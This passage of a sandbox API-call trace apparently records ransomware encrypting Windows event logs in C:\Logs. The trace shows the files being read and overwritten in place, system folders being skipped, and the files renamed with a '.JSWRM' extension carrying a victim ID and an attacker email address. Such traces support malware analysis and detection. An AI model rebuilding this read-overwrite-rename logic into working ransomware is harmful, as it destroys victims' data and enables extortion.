out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0066.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0066.884] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0066.884] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0066.884] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2491b8 [0066.884] ReadFile (in: hFile=0x450, lpBuffer=0x2491b8, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0066.891] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.891] WriteFile (in: hFile=0x450, lpBuffer=0x2491b8*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0066.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2491b8 | out: hHeap=0x1e0000) returned 1 [0066.891] CloseHandle (hObject=0x450) returned 1 [0066.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0066.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0066.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0066.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0066.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0066.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0066.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0066.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0066.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0066.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0066.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0066.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0066.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0066.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0066.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0066.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0066.893] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0066.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0066.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0066.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0066.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0066.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0066.894] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd122d184, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd122d184, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1d86ba0, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Winlogon%4Operational.evtx", cAlternateFileName="MID6AB~1.EVT")) returned 1 [0066.894] lstrcmpiW (lpString1="Microsoft-Windows-Winlogon%4Operational.evtx", lpString2=".") returned 1 [0066.894] lstrcmpiW (lpString1="Microsoft-Windows-Winlogon%4Operational.evtx", lpString2="..") returned 1 [0066.894] lstrcmpiW (lpString1="Microsoft-Windows-Winlogon%4Operational.evtx", lpString2="...") returned 1 [0066.894] lstrcmpiW (lpString1="Microsoft-Windows-Winlogon%4Operational.evtx", lpString2="windows") returned -1 [0066.894] lstrcmpiW (lpString1="Microsoft-Windows-Winlogon%4Operational.evtx", lpString2="recovery") returned -1 [0066.894] lstrcmpiW (lpString1="Microsoft-Windows-Winlogon%4Operational.evtx", lpString2="perflogs") returned -1 [0066.894] lstrcmpiW (lpString1="Microsoft-Windows-Winlogon%4Operational.evtx", lpString2="documents and settings") returned 1 [0066.894] lstrcmpiW (lpString1="Microsoft-Windows-Winlogon%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0066.895] lstrcmpiW (lpString1="Microsoft-Windows-Winlogon%4Operational.evtx", lpString2="system volume information") returned -1 [0066.895] lstrcmpiW (lpString1="Microsoft-Windows-Winlogon%4Operational.evtx", lpString2="msocache") returned -1 [0066.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0066.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Winlogon%4Operational.evtx", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0066.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0066.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Winlogon%4Operational.evtx", cchWideChar=44, lpMultiByteStr=0x1f8638, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Winlogon%4Operational.evtx", lpUsedDefaultChar=0x0) returned 44 [0066.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0066.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0066.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Winlogon%4Operational.evtx", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0066.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0066.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Winlogon%4Operational.evtx", cchWideChar=44, lpMultiByteStr=0x1f8670, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Winlogon%4Operational.evtx", lpUsedDefaultChar=0x0) returned 44 [0066.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0066.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0066.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0066.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0066.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0066.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0066.895] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0066.895] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0066.895] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2491b8 [0066.895] ReadFile (in: hFile=0x450, lpBuffer=0x2491b8, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0066.901] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.901] WriteFile (in: hFile=0x450, lpBuffer=0x2491b8*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0066.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2491b8 | out: hHeap=0x1e0000) returned 1 [0066.901] CloseHandle (hObject=0x450) returned 1 [0066.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0066.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0066.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0066.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0066.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0066.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0066.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0066.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0066.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0066.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0066.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0066.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0066.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0066.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23ede0 [0066.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0066.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0066.902] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-winlogon%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0066.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0066.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0066.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0066.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0066.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0066.903] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf164b9b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcf164b9b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1d86ba0, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-WMI-Activity%4Operational.evtx", cAlternateFileName="MIFF83~1.EVT")) returned 1 [0066.903] lstrcmpiW (lpString1="Microsoft-Windows-WMI-Activity%4Operational.evtx", lpString2=".") returned 1 [0066.903] lstrcmpiW (lpString1="Microsoft-Windows-WMI-Activity%4Operational.evtx", lpString2="..") returned 1 [0066.903] lstrcmpiW (lpString1="Microsoft-Windows-WMI-Activity%4Operational.evtx", lpString2="...") returned 1 [0066.903] lstrcmpiW (lpString1="Microsoft-Windows-WMI-Activity%4Operational.evtx", lpString2="windows") returned -1 [0066.903] lstrcmpiW (lpString1="Microsoft-Windows-WMI-Activity%4Operational.evtx", lpString2="recovery") returned -1 [0066.903] lstrcmpiW (lpString1="Microsoft-Windows-WMI-Activity%4Operational.evtx", lpString2="perflogs") returned -1 [0066.903] lstrcmpiW (lpString1="Microsoft-Windows-WMI-Activity%4Operational.evtx", lpString2="documents and settings") returned 1 [0066.903] lstrcmpiW (lpString1="Microsoft-Windows-WMI-Activity%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0066.903] lstrcmpiW (lpString1="Microsoft-Windows-WMI-Activity%4Operational.evtx", lpString2="system volume information") returned -1 [0066.903] lstrcmpiW (lpString1="Microsoft-Windows-WMI-Activity%4Operational.evtx", lpString2="msocache") returned -1 [0066.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0066.903] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-WMI-Activity%4Operational.evtx", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0066.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0066.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-WMI-Activity%4Operational.evtx", cchWideChar=48, lpMultiByteStr=0x20e268, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-WMI-Activity%4Operational.evtx", lpUsedDefaultChar=0x0) returned 48 [0066.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0066.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0066.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-WMI-Activity%4Operational.evtx", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0066.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0066.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-WMI-Activity%4Operational.evtx", cchWideChar=48, lpMultiByteStr=0x20e418, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-WMI-Activity%4Operational.evtx", lpUsedDefaultChar=0x0) returned 48 [0066.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0066.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0066.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0066.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0066.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0066.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0066.904] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0066.904] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=1052672) returned 1 [0066.904] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2491b8 [0066.904] ReadFile (in: hFile=0x450, lpBuffer=0x2491b8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesRead=0x345f63c*=0x27100, lpOverlapped=0x0) returned 1 [0066.972] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.972] WriteFile (in: hFile=0x450, lpBuffer=0x2491b8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesWritten=0x345f638*=0x27100, lpOverlapped=0x0) returned 1 [0066.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2491b8 | out: hHeap=0x1e0000) returned 1 [0066.973] CloseHandle (hObject=0x450) returned 1 [0067.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0067.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.004] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0067.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.004] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0067.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0067.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.004] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0067.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f030 [0067.004] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.004] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.004] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-wmi-activity%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0067.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0067.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0067.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0067.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0067.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0067.101] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50555c8d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50555c8d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xf9a458f4, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x111000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Security.evtx", cAlternateFileName="SECURI~1.EVT")) returned 1 [0067.102] lstrcmpiW (lpString1="Security.evtx", lpString2=".") returned 1 [0067.102] lstrcmpiW (lpString1="Security.evtx", lpString2="..") returned 1 [0067.102] lstrcmpiW (lpString1="Security.evtx", lpString2="...") returned 1 [0067.102] lstrcmpiW (lpString1="Security.evtx", lpString2="windows") returned -1 [0067.102] lstrcmpiW (lpString1="Security.evtx", lpString2="recovery") returned 1 [0067.102] lstrcmpiW (lpString1="Security.evtx", lpString2="perflogs") returned 1 [0067.102] lstrcmpiW (lpString1="Security.evtx", lpString2="documents and settings") returned 1 [0067.102] lstrcmpiW (lpString1="Security.evtx", lpString2="$RECYCLE.BIN") returned 1 [0067.102] lstrcmpiW (lpString1="Security.evtx", lpString2="system volume information") returned -1 [0067.102] lstrcmpiW (lpString1="Security.evtx", lpString2="msocache") returned 1 [0067.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0067.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Security.evtx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0067.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Security.evtx", cchWideChar=13, lpMultiByteStr=0x345f978, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Security.evtx", lpUsedDefaultChar=0x0) returned 13 [0067.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0067.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0067.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Security.evtx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0067.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Security.evtx", cchWideChar=13, lpMultiByteStr=0x345f948, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Security.evtx", lpUsedDefaultChar=0x0) returned 13 [0067.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0067.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0067.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 